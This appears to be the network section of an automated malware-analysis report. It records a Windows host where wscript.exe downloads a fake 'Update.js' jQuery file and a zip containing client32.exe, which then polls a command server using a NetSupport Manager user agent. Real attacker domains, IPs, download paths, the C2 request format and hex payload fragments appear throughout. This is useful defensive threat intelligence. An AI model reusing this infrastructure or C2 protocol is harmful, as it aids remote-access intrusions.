Nov 27, 2024 16:29:48.849232912 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.849344969 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.853190899 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.853307009 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.856452942 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.856537104 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.859890938 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.859960079 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.862762928 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.862833977 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.865860939 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.865938902 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:49.187064886 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:49.187086105 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:49.187330961 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:49.189997911 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:49.190141916 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:49.193119049 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:49.193205118 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:49.196146011 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:49.196219921 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:49.200217009 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:49.200321913 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:49.203099966 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:49.203182936 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:49.206213951 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:49.206291914 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:49.209323883 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:49.209410906 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:49.213218927 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:49.213291883 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:49.216008902 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:49.216093063 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:49.219965935 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:49.220058918 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:49.223068953 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:49.223157883 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:49.226058006 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:49.226150990 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:49.230417967 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:49.230509043 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:49.233028889 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:49.233108997 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:49.236177921 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:49.236259937 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:49.387274027 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:49.387454987 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:49.390252113 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:49.390347958 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:49.390360117 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:49.390394926 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:49.390544891 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:49.390562057 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:54.539207935 CET	49737	443	192.168.2.4	194.180.191.64
Nov 27, 2024 16:29:54.539254904 CET	443	49737	194.180.191.64	192.168.2.4
Nov 27, 2024 16:29:54.539320946 CET	49737	443	192.168.2.4	194.180.191.64
Nov 27, 2024 16:29:54.682133913 CET	49737	443	192.168.2.4	194.180.191.64
Nov 27, 2024 16:29:54.682163000 CET	443	49737	194.180.191.64	192.168.2.4
Nov 27, 2024 16:29:54.682224035 CET	443	49737	194.180.191.64	192.168.2.4
Nov 27, 2024 16:29:54.932353973 CET	49739	80	192.168.2.4	104.26.1.231
Nov 27, 2024 16:29:55.052555084 CET	80	49739	104.26.1.231	192.168.2.4
Nov 27, 2024 16:29:55.052928925 CET	49739	80	192.168.2.4	104.26.1.231
Nov 27, 2024 16:29:55.052928925 CET	49739	80	192.168.2.4	104.26.1.231
Nov 27, 2024 16:29:55.173080921 CET	80	49739	104.26.1.231	192.168.2.4
Nov 27, 2024 16:29:56.421158075 CET	80	49739	104.26.1.231	192.168.2.4
Nov 27, 2024 16:29:56.422189951 CET	49739	80	192.168.2.4	104.26.1.231

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 27, 2024 16:29:33.776920080 CET	60039	53	192.168.2.4	1.1.1.1
Nov 27, 2024 16:29:34.215512991 CET	53	60039	1.1.1.1	192.168.2.4
Nov 27, 2024 16:29:54.767805099 CET	51969	53	192.168.2.4	1.1.1.1
Nov 27, 2024 16:29:54.907905102 CET	53	51969	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 27, 2024 16:29:33.776920080 CET	192.168.2.4	1.1.1.1	0x7f4d	Standard query (0)	studioclic53.com	A (IP address)	IN (0x0001)	false
Nov 27, 2024 16:29:54.767805099 CET	192.168.2.4	1.1.1.1	0xe285	Standard query (0)	geo.netsupportsoftware.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 27, 2024 16:29:34.215512991 CET	1.1.1.1	192.168.2.4	0x7f4d	No error (0)	studioclic53.com	79.141.173.158	A (IP address)	IN (0x0001)	false
Nov 27, 2024 16:29:54.907905102 CET	1.1.1.1	192.168.2.4	0xe285	No error (0)	geo.netsupportsoftware.com	104.26.1.231	A (IP address)	IN (0x0001)	false
Nov 27, 2024 16:29:54.907905102 CET	1.1.1.1	192.168.2.4	0xe285	No error (0)	geo.netsupportsoftware.com	172.67.68.212	A (IP address)	IN (0x0001)	false
Nov 27, 2024 16:29:54.907905102 CET	1.1.1.1	192.168.2.4	0xe285	No error (0)	geo.netsupportsoftware.com	104.26.0.231	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

studioclic53.com

194.180.191.64connection: keep-alivecmd=pollinfo=1ack=1

geo.netsupportsoftware.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	194.180.191.64	443	5104	C:\ProgramData\o2xqxqs\client32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 27, 2024 16:29:54.682133913 CET	220	OUT	POST http://194.180.191.64/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 194.180.191.64Connection: Keep-AliveCMD=POLLINFO=1ACK=1 Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	104.26.1.231	80	5104	C:\ProgramData\o2xqxqs\client32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 27, 2024 16:29:55.052928925 CET	118	OUT	GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
Nov 27, 2024 16:29:56.421158075 CET	990	IN	HTTP/1.1 200 OK Date: Wed, 27 Nov 2024 15:29:56 GMT Content-Type: text/html; Charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive CF-Ray: 8e9328152e466a50-EWR CF-Cache-Status: DYNAMIC Access-Control-Allow-Origin: * Cache-Control: private Set-Cookie: ASPSESSIONIDQARCTTCQ=CBMANDNCMBGFIEDNLOBDHBHA; path=/ cf-apo-via: origin,host X-Frame-Options: SAMEORIGIN X-Powered-By: ASP.NET Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BcUp9Ug5h6eoiSyCl3PXem6XV%2B1U3%2Fdu7i3Jc49aSCwgSDjlsvkKFbEpDQ42gsIQ8GWorv2EENpT2ivnBRdlj982fqzz1OBVUgLt%2FGCdsH8Rkhd5Ze96kMHyC9h8zr5cwVnSo1NuW5SGLiHN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare server-timing: cfL4;desc="?proto=TCP&rtt=1820&min_rtt=1820&rtt_var=910&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 30 0d 0a 34 30 2e 37 33 35 37 2c 2d 37 34 2e 31 37 32 34 0d 0a 30 0d 0a 0d 0a Data Ascii: 1040.7357,-74.17240

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	79.141.173.158	443	5088	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-27 15:29:35 UTC	383	OUT	POST /work/fix2.php?5436 HTTP/1.1 Accept: / Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: studioclic53.com Content-Length: 5 Connection: Keep-Alive Cache-Control: no-cache
2024-11-27 15:29:35 UTC	5	OUT	Data Raw: 31 31 41 51 3d Data Ascii: 11AQ=
2024-11-27 15:29:36 UTC	356	IN	HTTP/1.1 200 OK Date: Wed, 27 Nov 2024 15:29:36 GMT Server: Apache/2.4.52 (Ubuntu) Content-Description: File Transfer Content-Disposition: attachment; filename=Update.js Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Content-Length: 2983781 Connection: close Content-Type: application/octet-stream
2024-11-27 15:29:36 UTC	7836	IN	Data Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 43 6f 6d 70 61 74 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 79 20 76 33 2e 30 2e 30 2d 61 6c 70 68 61 31 0a 20 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 49 6e 63 6c 75 64 65 73 20 53 69 7a 7a 6c 65 2e 6a 73 0a 20 2a 20 68 74 74 70 3a 2f 2f 73 69 7a 7a 6c 65 6a 73 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 44 61 74 65 Data Ascii: /! jQuery Compat JavaScript Library v3.0.0-alpha1 * http://jquery.com/ * * Includes Sizzle.js * http://sizzlejs.com/ * * Copyright jQuery Foundation and other contributors * Released under the MIT license * http://jquery.org/license * * Date
2024-11-27 15:29:36 UTC	16384	IN	Data Raw: 69 66 20 6c 61 73 74 20 6f 6e 65 20 69 73 20 6f 77 6e 2c 20 74 68 65 6e 20 61 6c 6c 20 70 72 6f 70 65 72 74 69 65 73 20 61 72 65 20 6f 77 6e 2e 0a 09 09 66 6f 72 20 28 20 6b 65 79 20 69 6e 20 6f 62 6a 20 29 20 7b 7d 0a 0a 09 09 72 65 74 75 72 6e 20 6b 65 79 20 3d 3d 3d 20 75 6e 64 65 66 69 6e 65 64 20 7c 7c 20 68 61 73 4f 77 6e 2e 63 61 6c 6c 28 20 6f 62 6a 2c 20 6b 65 79 20 29 3b 0a 09 7d 2c 0a 0a 09 74 79 70 65 3a 20 66 75 6e 63 74 69 6f 6e 28 20 6f 62 6a 20 29 20 7b 0a 09 09 69 66 20 28 20 6f 62 6a 20 3d 3d 20 6e 75 6c 6c 20 29 20 7b 0a 09 09 09 72 65 74 75 72 6e 20 6f 62 6a 20 2b 20 22 22 3b 0a 09 09 7d 0a 09 09 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 6f 62 6a 20 3d 3d 3d 20 22 6f 62 6a 65 63 74 22 20 7c 7c 20 74 79 70 65 6f 66 20 6f 62 6a 20 3d 3d Data Ascii: if last one is own, then all properties are own.for ( key in obj ) {}return key === undefined \|\| hasOwn.call( obj, key );},type: function( obj ) {if ( obj == null ) {return obj + "";}return typeof obj === "object" \|\| typeof obj ==
2024-11-27 15:29:36 UTC	16384	IN	Data Raw: 72 20 74 68 61 6e 20 45 78 70 72 2e 63 61 63 68 65 4c 65 6e 67 74 68 29 0a 20 2a 09 64 65 6c 65 74 69 6e 67 20 74 68 65 20 6f 6c 64 65 73 74 20 65 6e 74 72 79 0a 20 2a 2f 0a 66 75 6e 63 74 69 6f 6e 20 63 72 65 61 74 65 43 61 63 68 65 28 29 20 7b 0a 09 76 61 72 20 6b 65 79 73 20 3d 20 5b 5d 3b 0a 0a 09 66 75 6e 63 74 69 6f 6e 20 63 61 63 68 65 28 20 6b 65 79 2c 20 76 61 6c 75 65 20 29 20 7b 0a 09 09 2f 2f 20 55 73 65 20 28 6b 65 79 20 2b 20 22 20 22 29 20 74 6f 20 61 76 6f 69 64 20 63 6f 6c 6c 69 73 69 6f 6e 20 77 69 74 68 20 6e 61 74 69 76 65 20 70 72 6f 74 6f 74 79 70 65 20 70 72 6f 70 65 72 74 69 65 73 20 28 73 65 65 20 49 73 73 75 65 20 23 31 35 37 29 0a 09 09 69 66 20 28 20 6b 65 79 73 2e 70 75 73 68 28 20 6b 65 79 20 2b 20 22 20 22 20 29 20 3e 20 45 Data Ascii: r than Expr.cacheLength) deleting the oldest entry /function createCache() {var keys = [];function cache( key, value ) {// Use (key + " ") to avoid collision with native prototype properties (see Issue #157)if ( keys.push( key + " " ) > E
2024-11-27 15:29:36 UTC	16384	IN	Data Raw: 43 61 73 65 28 29 20 5d 2c 0a 09 09 2f 2f 20 44 6f 6e 27 74 20 67 65 74 20 66 6f 6f 6c 65 64 20 62 79 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 20 70 72 6f 70 65 72 74 69 65 73 20 28 6a 51 75 65 72 79 20 23 31 33 38 30 37 29 0a 09 09 76 61 6c 20 3d 20 66 6e 20 26 26 20 68 61 73 4f 77 6e 2e 63 61 6c 6c 28 20 45 78 70 72 2e 61 74 74 72 48 61 6e 64 6c 65 2c 20 6e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 29 20 3f 0a 09 09 09 66 6e 28 20 65 6c 65 6d 2c 20 6e 61 6d 65 2c 20 21 64 6f 63 75 6d 65 6e 74 49 73 48 54 4d 4c 20 29 20 3a 0a 09 09 09 75 6e 64 65 66 69 6e 65 64 3b 0a 0a 09 72 65 74 75 72 6e 20 76 61 6c 20 21 3d 3d 20 75 6e 64 65 66 69 6e 65 64 20 3f 0a 09 09 76 61 6c 20 3a 0a 09 09 73 75 70 70 6f 72 74 2e 61 74 74 72 69 62 75 74 65 Data Ascii: Case() ],// Don't get fooled by Object.prototype properties (jQuery #13807)val = fn && hasOwn.call( Expr.attrHandle, name.toLowerCase() ) ?fn( elem, name, !documentIsHTML ) :undefined;return val !== undefined ?val :support.attribute
2024-11-27 15:29:36 UTC	16384	IN	Data Raw: 3b 0a 09 09 7d 29 2c 0a 0a 09 09 22 6f 64 64 22 3a 20 63 72 65 61 74 65 50 6f 73 69 74 69 6f 6e 61 6c 50 73 65 75 64 6f 28 66 75 6e 63 74 69 6f 6e 28 20 6d 61 74 63 68 49 6e 64 65 78 65 73 2c 20 6c 65 6e 67 74 68 20 29 20 7b 0a 09 09 09 76 61 72 20 69 20 3d 20 31 3b 0a 09 09 09 66 6f 72 20 28 20 3b 20 69 20 3c 20 6c 65 6e 67 74 68 3b 20 69 20 2b 3d 20 32 20 29 20 7b 0a 09 09 09 09 6d 61 74 63 68 49 6e 64 65 78 65 73 2e 70 75 73 68 28 20 69 20 29 3b 0a 09 09 09 7d 0a 09 09 09 72 65 74 75 72 6e 20 6d 61 74 63 68 49 6e 64 65 78 65 73 3b 0a 09 09 7d 29 2c 0a 0a 09 09 22 6c 74 22 3a 20 63 72 65 61 74 65 50 6f 73 69 74 69 6f 6e 61 6c 50 73 65 75 64 6f 28 66 75 6e 63 74 69 6f 6e 28 20 6d 61 74 63 68 49 6e 64 65 78 65 73 2c 20 6c 65 6e 67 74 68 2c 20 61 72 67 75 Data Ascii: ;}),"odd": createPositionalPseudo(function( matchIndexes, length ) {var i = 1;for ( ; i < length; i += 2 ) {matchIndexes.push( i );}return matchIndexes;}),"lt": createPositionalPseudo(function( matchIndexes, length, argu
2024-11-27 15:29:36 UTC	16384	IN	Data Raw: 74 73 3b 0a 09 09 09 09 09 7d 0a 0a 09 09 09 09 09 62 72 65 61 6b 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 09 09 7d 0a 09 7d 0a 0a 09 2f 2f 20 43 6f 6d 70 69 6c 65 20 61 6e 64 20 65 78 65 63 75 74 65 20 61 20 66 69 6c 74 65 72 69 6e 67 20 66 75 6e 63 74 69 6f 6e 20 69 66 20 6f 6e 65 20 69 73 20 6e 6f 74 20 70 72 6f 76 69 64 65 64 0a 09 2f 2f 20 50 72 6f 76 69 64 65 20 60 6d 61 74 63 68 60 20 74 6f 20 61 76 6f 69 64 20 72 65 74 6f 6b 65 6e 69 7a 61 74 69 6f 6e 20 69 66 20 77 65 20 6d 6f 64 69 66 69 65 64 20 74 68 65 20 73 65 6c 65 63 74 6f 72 20 61 62 6f 76 65 0a 09 28 20 63 6f 6d 70 69 6c 65 64 20 7c 7c 20 63 6f 6d 70 69 6c 65 28 20 73 65 6c 65 63 74 6f 72 2c 20 6d 61 74 63 68 20 29 20 29 28 0a 09 09 73 65 65 64 2c 0a 09 09 63 6f 6e 74 65 78 74 2c 0a 09 09 Data Ascii: ts;}break;}}}}// Compile and execute a filtering function if one is not provided// Provide `match` to avoid retokenization if we modified the selector above( compiled \|\| compile( selector, match ) )(seed,context,
2024-11-27 15:29:36 UTC	16384	IN	Data Raw: 0a 09 09 09 7d 2c 0a 0a 09 09 09 2f 2f 20 52 65 6d 6f 76 65 20 61 20 63 61 6c 6c 62 61 63 6b 20 66 72 6f 6d 20 74 68 65 20 6c 69 73 74 0a 09 09 09 72 65 6d 6f 76 65 3a 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 09 09 09 6a 51 75 65 72 79 2e 65 61 63 68 28 20 61 72 67 75 6d 65 6e 74 73 2c 20 66 75 6e 63 74 69 6f 6e 28 20 5f 2c 20 61 72 67 20 29 20 7b 0a 09 09 09 09 09 76 61 72 20 69 6e 64 65 78 3b 0a 09 09 09 09 09 77 68 69 6c 65 20 28 20 28 20 69 6e 64 65 78 20 3d 20 6a 51 75 65 72 79 2e 69 6e 41 72 72 61 79 28 20 61 72 67 2c 20 6c 69 73 74 2c 20 69 6e 64 65 78 20 29 20 29 20 3e 20 2d 31 20 29 20 7b 0a 09 09 09 09 09 09 6c 69 73 74 2e 73 70 6c 69 63 65 28 20 69 6e 64 65 78 2c 20 31 20 29 3b 0a 0a 09 09 09 09 09 09 2f 2f 20 48 61 6e 64 6c 65 20 66 69 72 Data Ascii: },// Remove a callback from the listremove: function() {jQuery.each( arguments, function( _, arg ) {var index;while ( ( index = jQuery.inArray( arg, list, index ) ) > -1 ) {list.splice( index, 1 );// Handle fir
2024-11-27 15:29:36 UTC	16384	IN	Data Raw: 74 44 61 74 61 28 20 65 6c 65 6d 20 29 20 29 20 7b 0a 09 09 72 65 74 75 72 6e 3b 0a 09 7d 0a 0a 09 76 61 72 20 74 68 69 73 43 61 63 68 65 2c 20 70 72 6f 70 2c 0a 09 09 69 6e 74 65 72 6e 61 6c 4b 65 79 20 3d 20 6a 51 75 65 72 79 2e 65 78 70 61 6e 64 6f 2c 0a 0a 09 09 2f 2f 20 57 65 20 68 61 76 65 20 74 6f 20 68 61 6e 64 6c 65 20 44 4f 4d 20 6e 6f 64 65 73 20 61 6e 64 20 4a 53 20 6f 62 6a 65 63 74 73 20 64 69 66 66 65 72 65 6e 74 6c 79 20 62 65 63 61 75 73 65 20 49 45 36 2d 37 0a 09 09 2f 2f 20 63 61 6e 27 74 20 47 43 20 6f 62 6a 65 63 74 20 72 65 66 65 72 65 6e 63 65 73 20 70 72 6f 70 65 72 6c 79 20 61 63 72 6f 73 73 20 74 68 65 20 44 4f 4d 2d 4a 53 20 62 6f 75 6e 64 61 72 79 0a 09 09 69 73 4e 6f 64 65 20 3d 20 65 6c 65 6d 2e 6e 6f 64 65 54 79 70 65 2c 0a Data Ascii: tData( elem ) ) {return;}var thisCache, prop,internalKey = jQuery.expando,// We have to handle DOM nodes and JS objects differently because IE6-7// can't GC object references properly across the DOM-JS boundaryisNode = elem.nodeType,
2024-11-27 15:29:36 UTC	16384	IN	Data Raw: 7b 0a 09 09 6a 51 75 65 72 79 2e 5f 64 61 74 61 28 0a 09 09 09 65 6c 65 6d 2c 0a 09 09 09 22 67 6c 6f 62 61 6c 45 76 61 6c 22 2c 0a 09 09 09 21 72 65 66 45 6c 65 6d 65 6e 74 73 20 7c 7c 20 6a 51 75 65 72 79 2e 5f 64 61 74 61 28 20 72 65 66 45 6c 65 6d 65 6e 74 73 5b 69 5d 2c 20 22 67 6c 6f 62 61 6c 45 76 61 6c 22 20 29 0a 09 09 29 3b 0a 09 7d 0a 7d 0a 0a 76 61 72 20 72 68 74 6d 6c 20 3d 20 2f 3c 7c 26 23 3f 5c 77 2b 3b 2f 3b 0a 0a 66 75 6e 63 74 69 6f 6e 20 62 75 69 6c 64 46 72 61 67 6d 65 6e 74 28 20 65 6c 65 6d 73 2c 20 63 6f 6e 74 65 78 74 2c 20 73 63 72 69 70 74 73 2c 20 73 65 6c 65 63 74 69 6f 6e 2c 20 69 67 6e 6f 72 65 64 20 29 20 7b 0a 09 76 61 72 20 6a 2c 20 65 6c 65 6d 2c 20 63 6f 6e 74 61 69 6e 73 2c 0a 09 09 74 6d 70 2c 20 74 61 67 2c 20 77 72 Data Ascii: {jQuery._data(elem,"globalEval",!refElements \|\| jQuery._data( refElements[i], "globalEval" ));}}var rhtml = /<\|&#?\w+;/;function buildFragment( elems, context, scripts, selection, ignored ) {var j, elem, contains,tmp, tag, wr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	79.141.173.158	443	5088	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-27 15:29:44 UTC	337	OUT	GET /work/yyy.zip?5668 HTTP/1.1 Accept: / Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: studioclic53.com Connection: Keep-Alive
2024-11-27 15:29:45 UTC	261	IN	HTTP/1.1 200 OK Date: Wed, 27 Nov 2024 15:29:44 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Tue, 26 Nov 2024 19:01:23 GMT ETag: "230bc4-627d579ae535a" Accept-Ranges: bytes Content-Length: 2296772 Connection: close Content-Type: application/zip
2024-11-27 15:29:45 UTC	7931	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 1c 44 57 57 9d 9e 25 e6 26 6c 00 00 90 95 01 00 0c 00 00 00 63 6c 69 65 6e 74 33 32 2e 65 78 65 ec 7c 07 78 54 c5 d7 f7 d9 f4 4e 0a 01 22 fa 52 fe a0 88 12 41 91 57 08 84 40 08 9d 84 f4 b2 9b b2 d9 54 6a 80 24 80 10 05 51 ff 40 a8 02 82 20 8a 10 d2 37 21 85 92 d0 8b 40 10 10 69 4a 17 a4 a4 f7 9e 0d e7 3b 33 bb 9b 02 09 52 82 f2 7e 0f e7 ee ef de 99 3b 67 ce cc bd bf 33 67 66 6e 78 98 e0 b1 0a 54 01 40 8d 80 08 b0 07 e4 62 05 7f 2f 7f 12 0c ba 64 1a 40 ba f6 99 6e 7b 04 e3 cf 74 73 0a 0a 9e d5 35 64 e6 f4 c0 99 e2 a9 5d 25 e2 69 d3 a6 87 76 f5 f5 ef 3a 33 6c 5a d7 e0 69 5d 47 d8 39 76 9d 3a dd cf df 5c 5f 5f a7 87 c2 46 dd 29 cd 43 07 13 82 d7 28 b1 eb 42 ed 9a fd 74 8d 1a 50 b1 66 1f bf 17 b4 26 93 e7 8f ac 39 c0 af 65 8a 6b Data Ascii: PKDWW%&lclient32.exe\|xTN"RAW@Tj$Q@ 7!@iJ;3R~;g3gfnxT@b/d@n{ts5d]%iv:3lZi]G9v:\__F)C(BtPf&9ek
2024-11-27 15:29:45 UTC	8000	IN	Data Raw: 68 ad 51 52 52 da d8 6e 49 09 5f 7f 1e 59 25 e6 3a 49 9e 86 cd da 4b 23 ee 53 5b e1 7f cc 98 31 c8 e6 80 27 81 f1 fa 6f c3 6a d8 30 74 15 11 ff c2 be b8 c3 53 97 8f 89 36 01 ed 8d 62 69 ad f5 5b ca 37 0a fe cb 1f e7 7f da fb 98 e0 ac 42 5c 1a f3 fd f5 f9 9d df 21 0d 37 d2 29 e1 ba 4a 94 10 0f 34 85 e0 95 63 c9 18 eb c2 78 d0 e3 63 ff f1 76 c9 8f 84 3a fc 6f 85 17 33 b7 20 fb df 0b 4a 14 f5 e5 20 3f 2a 2b 47 da d2 e1 d9 a4 e5 7c 1d 90 4c 71 2a d1 9d f8 9f 3f ac 45 fe 69 d9 88 47 56 8b 29 b6 68 d0 33 19 36 6b 2f dd 97 7c c0 57 ce ff 1b cf c1 ff 8b a0 2d f9 77 13 f9 e0 62 61 3f e2 5f 8f bf c3 36 81 97 21 e7 ff 3c f1 5f 49 ef b0 bc a2 02 cb 28 fe 96 11 1f b4 fc c3 ec 3f 2f 63 da f4 3e 98 e8 aa c6 7d 60 ef 97 b6 b4 4e a8 24 bd 4a ae c3 75 09 a5 a5 c4 01 ad 03 Data Ascii: hQRRnI_Y%:IK#S[1'oj0tS6bi[7B\!7)J4cxcv:o3 J ?+G\|Lq?EiGV)h36k/\|W-wba?_6!<_I(?/c>}`N$Ju
2024-11-27 15:29:45 UTC	8000	IN	Data Raw: b0 43 a4 8a 99 06 52 fe 36 36 36 90 c9 40 e7 8e 40 75 ed 65 34 b7 b0 c4 34 4b 07 84 b9 7f 8a ec 80 81 6c 4c d4 90 1b a0 d1 0a fd 91 e5 d1 03 45 31 86 f8 e5 c7 fd 78 f9 aa 19 87 19 ff cd 33 15 50 32 c7 1c 77 6e fe 2c e5 7a ee 28 0a a3 8c b1 7e ba 02 f6 b3 f1 7d f4 fc 29 2f 3f 5d be 86 e9 8a 32 8a d8 fc dd b8 dc c4 d7 c7 81 0d 73 91 ed ad 84 92 40 35 c6 bf 37 e7 6f 67 67 07 92 c1 da da ba 0d 88 77 57 b0 9c 69 85 8f 67 3a 22 dc 63 06 72 44 83 d8 98 f4 45 9e a8 ff 1b 04 0e 40 b6 67 0f 14 c7 18 e1 da 99 03 68 26 fd d9 98 84 0c 37 55 9c d9 95 29 f5 c1 7a f6 18 fb 56 47 22 d3 45 01 19 f6 3d 91 17 34 14 4d 07 8a 40 1e 7a 4f 1e dd 43 d5 12 6b 14 85 eb e1 d6 a5 26 90 d7 6e fd a6 b9 c8 f1 55 42 69 50 3f 39 7f 07 07 07 74 26 83 0c 54 d7 1e 33 ad 6d f0 09 e3 1f e9 35 Data Ascii: CR666@@ue44KlLE1x3P2wn,z(~})/?]2s@57oggwWig:"crDE@gh&7U)zVG"E=4M@zOCk&nUBiP?9t&T3m5
